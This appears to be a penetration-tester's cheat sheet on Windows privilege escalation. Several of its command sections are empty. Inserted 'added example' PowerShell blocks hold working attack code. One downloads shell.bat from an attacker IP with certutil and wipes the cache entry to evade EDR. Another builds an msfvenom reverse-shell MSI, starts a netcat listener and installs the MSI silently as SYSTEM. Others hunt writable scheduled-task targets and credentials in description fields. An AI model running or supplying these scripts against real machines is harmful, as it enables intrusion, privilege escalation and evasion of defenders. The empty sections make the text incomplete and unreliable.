Misc Techniques

Living Off The Land Binaries & Scripts (LOLBAS)

The LOLBAS project is the Windows counterpart of GTFOBins.

Each of these binaries, scripts and libraries is a Microsoft-signed file that is either native to the operating system or can be downloaded directly from Microsoft, and has unexpected functionality that is useful to an attacker:

Code execution

Code compilation

File transfers

Persistence

UAC bypass

Credential theft

Dumping process memory

Keylogging

Evasion

DLL hijacking

Example: certutil.exe, whose intended purpose is certificate management.

We can use it to download a remote file:

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

We can also use it to encode a file in base64:

certutil -encode file1 encodedfile

And decode it:

certutil -decode encodedfile file2

There is also rundll32.exe, which can be used to load a DLL and call one of its exported functions (rundll32.exe <dll>,<export>).
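The certutil workflow above, as an added example that is not part of the original page: a download cradle that verifies the fetched file against a hash computed on the attacker side and removes the URL-cache entry certutil leaves behind, plus the base64 encode/decode round trip with an integrity check. The URL and file names are taken from the page or are placeholders; $ExpectedSha256 is an assumed parameter the operator supplies.

```powershell
# Added example (not the page's own code). Requires only built-in certutil.exe.

function Get-FileViaCertutil {
    param(
        [Parameter(Mandatory)][string]$Url,       # e.g. http://10.10.14.3:8080/shell.bat (the page's attacker host)
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256                   # assumed: hash computed on the attacker side before transfer
    )
    # -urlcache: go through the URL cache service, -split: write the blob to disk, -f: overwrite
    & certutil.exe -urlcache -split -f $Url $OutFile | Out-Null
    if (-not (Test-Path -LiteralPath $OutFile)) { throw "download failed: $Url" }

    # certutil -hashfile prints the digest on its second output line (older builds space the bytes)
    $hash = (& certutil.exe -hashfile $OutFile SHA256)[1] -replace '\s', ''
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256) {
        Remove-Item -LiteralPath $OutFile -Force
        throw "hash mismatch for $OutFile : got $hash"
    }

    # The transfer leaves a WinINet cache entry pointing at the attacker URL; delete it
    & certutil.exe -urlcache $Url delete | Out-Null
    return $hash
}

function Test-CertutilBase64RoundTrip {
    param([Parameter(Mandatory)][string]$Path)
    $encoded = "$Path.b64"
    $decoded = "$Path.dec"
    # -encode wraps the base64 in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines,
    # which is handy for pasting through a restricted channel; -decode strips them again.
    & certutil.exe -f -encode $Path $encoded | Out-Null
    & certutil.exe -f -decode $encoded $decoded | Out-Null
    $before = (Get-FileHash -LiteralPath $Path    -Algorithm SHA256).Hash
    $after  = (Get-FileHash -LiteralPath $decoded -Algorithm SHA256).Hash
    return ($before -eq $after)
}

# Usage (paths are placeholders):
#   Get-FileViaCertutil -Url 'http://10.10.14.3:8080/shell.bat' -OutFile 'C:\Users\Public\shell.bat' -ExpectedSha256 '<hash>'
#   Test-CertutilBase64RoundTrip -Path 'C:\Users\Public\shell.bat'
# Equivalent execution primitive with rundll32 (DLL and export are hypothetical):
#   rundll32.exe C:\Users\Public\payload.dll,EntryPoint
```

Note that certutil downloads are noisy: the process creates network connections and cache entries that many EDR rules key on, which is why the cleanup step is included.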

Always Install Elevated

AlwaysInstallElevated is a policy that allows every user on a Windows machine (including low-privileged users) to install any MSI file with elevated privileges, i.e. the installer runs as NT AUTHORITY\SYSTEM. MSI is the Microsoft installer package format used to install, maintain and remove programs; the MSI is the package, not the program itself.

This setting is enabled via Local Group Policy by setting "Always install with elevated privileges" to Enabled under both of the following paths (the policy only takes effect when both the machine and the user setting are enabled):

  • Computer Configuration\Administrative Templates\Windows Components\Windows Installer

  • User Configuration\Administrative Templates\Windows Components\Windows Installer

Enumerating Always Install Elevated Settings

For the current user:

System wide:

Generating Malicious MSI

This malicious MSI runs automatically once installed and spawns a reverse shell.

Installing the MSI

After installation the payload runs automatically and we should catch a shell on our listener.
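The full procedure from the sections above (enumerate, generate, install), as an added example that is not part of the original page. The registry values are the ones the Group Policy paths above write; the attacker IP and port, the MSI path and the payload name are placeholders.

```powershell
# Added example (not the page's own code).

function Test-AlwaysInstallElevated {
    # The policy is only effective when BOTH values are 1; one of them alone does nothing.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',   # Computer Configuration
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'    # User Configuration
    $enabled = $true
    foreach ($key in $keys) {
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        "{0,-6} AlwaysInstallElevated = {1}" -f $key.Split(':')[0], ($(if ($null -eq $value) { '<not set>' } else { $value }))
        if ($value -ne 1) { $enabled = $false }
    }
    return $enabled
}

# Attacker side (Kali), generate the package and start a listener (values are placeholders):
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f msi -o shell.msi
#   nc -lvnp 4444
# Transfer shell.msi to a directory the low-privileged user can write, e.g. C:\Users\Public.

$msi = 'C:\Users\Public\shell.msi'   # placeholder
if (Test-AlwaysInstallElevated) {
    # /i install, /quiet /qn suppress all UI. Do not -Wait: msiexec blocks until the reverse shell exits.
    Start-Process -FilePath msiexec.exe -ArgumentList '/quiet', '/qn', '/i', $msi
} else {
    Write-Warning 'AlwaysInstallElevated is not enabled in both hives; this vector does not apply.'
}
```

If the shell lands but dies after a short time, the installer has rolled back because the custom action never returned; the usual workaround is to have the payload spawn a detached process rather than block the installer.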

CVE-2019-1388

CVE-2019-1388 was a privilege escalation vulnerability in the Windows Certificate Dialog, which did not properly enforce user privileges.

The issue was in the UAC mechanism: the consent prompt offers to show details about the executable's certificate, which opens the Windows certificate dialog when the user clicks the publisher link.

Because the dialog runs in the elevated context, clicking the hyperlink inside it launches a browser window running as NT AUTHORITY\SYSTEM. Once the browser is open, it is possible to "break out" of it via the View page source menu option and launch a cmd.exe or PowerShell.exe console as SYSTEM.

More details on how to exploit here => https://academy.hackthebox.com/module/67/section/635

Scheduled Tasks

List scheduled tasks with CMD:

List scheduled tasks with Powershell:

By default we can only see tasks created by our own user plus the default scheduled tasks that every Windows installation has. We cannot list tasks created by other users (such as admins), because their definitions live in C:\Windows\System32\Tasks, which standard users cannot read.

Scheduled tasks usually run a script or executable. If we have write access to that file we can replace it or append our own code, and it will run with the task's privileges the next time the task fires.
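A check for the condition described above, as an added example that is not part of the original page: enumerate the tasks we are allowed to see, resolve each action's executable and any file paths in its arguments, and report the ones the current user can modify. It uses the built-in ScheduledTasks module (Windows 8 / Server 2012 and later) and Get-Acl; the ACL check only looks at Allow ACEs for the current token's SIDs, so a matching Deny ACE is an assumed edge case it does not model.

```powershell
# Added example (not the page's own code).

function Get-WritableTaskTargets {
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl

    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Exec actions expose Execute/Arguments; COM-handler actions have neither and are skipped.
            if (-not $action.Execute) { continue }
            # Candidates: the executable itself plus anything in the arguments that looks like a path
            # (e.g. a .bat or .ps1 handed to cmd.exe or powershell.exe).
            $candidates = @($action.Execute) +
                          @([regex]::Matches([string]$action.Arguments, '[A-Za-z]:\\[^\s"]+') | ForEach-Object { $_.Value })
            foreach ($raw in $candidates) {
                $path = [Environment]::ExpandEnvironmentVariables($raw).Trim('"')
                if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
                $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
                if (-not $acl) { continue }
                $writable = $acl.Access | Where-Object {
                    if ($_.AccessControlType -ne 'Allow') { return $false }
                    if (-not ($_.FileSystemRights -band $writeMask)) { return $false }
                    try { $sid = $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
                    catch { return $false }   # orphaned or unresolvable account
                    $sids -contains $sid
                }
                if ($writable) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunsAs    = $task.Principal.UserId
                        RunLevel  = $task.Principal.RunLevel
                        File      = $path
                    }
                }
            }
        }
    }
}

Get-WritableTaskTargets | Format-Table -AutoSize
```

Tasks where RunsAs is SYSTEM or an administrator and RunLevel is Highest are the interesting hits; a writable script that runs as our own user gains nothing.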

User/Computer Description Field

User:

Computer:
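Pulling the description fields and flagging ones that look like they hold credentials, as an added example that is not part of the original page. Local user descriptions come from Get-LocalUser, the computer description from Win32_OperatingSystem; the keyword list is an assumption and should be tuned per engagement. For domain objects the same idea applies with Get-ADUser/Get-ADComputer and the Description property (RSAT required, not shown).

```powershell
# Added example (not the page's own code).

function Find-SuspiciousDescriptions {
    param([string]$Pattern = 'pass|pwd|cred|secret|login|key|pin')   # assumed keyword list

    $entries = @()
    # Local users: the Description column is where admins tend to leave "temp password: ..." notes
    $entries += Get-LocalUser | ForEach-Object {
        [pscustomobject]@{ Type = 'User'; Name = $_.Name; Description = $_.Description }
    }
    # The computer description (System Properties -> Computer description) is stored on the OS object
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $entries += [pscustomobject]@{ Type = 'Computer'; Name = $env:COMPUTERNAME; Description = $os.Description }

    # Show everything with a non-empty description, mark the ones matching the keyword list
    $entries | Where-Object { $_.Description } | ForEach-Object {
        $_ | Add-Member -NotePropertyName Suspicious -NotePropertyValue ($_.Description -match $Pattern) -PassThru
    }
}

Find-SuspiciousDescriptions | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Read the full list rather than only the flagged rows; a description like "see ticket 4711" often points at where the password actually is.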

Mount VHDX/VMDK

  • .vhd => Virtual Hard Disk

  • .vhdx => Virtual Hard Disk v2

  • .vmdk => Virtual Machine Disk

If we find one of those, we can mount them:

VMDK:

VHD/VHDX:

Once it is mounted we can access the C:\Windows\System32\Config directory on the image and pull down the SAM, SECURITY and SYSTEM registry hives. Because the image is offline, the hives are not locked the way they are on a running system.

Then we can use secretsdump to extract the password hashes for local users:
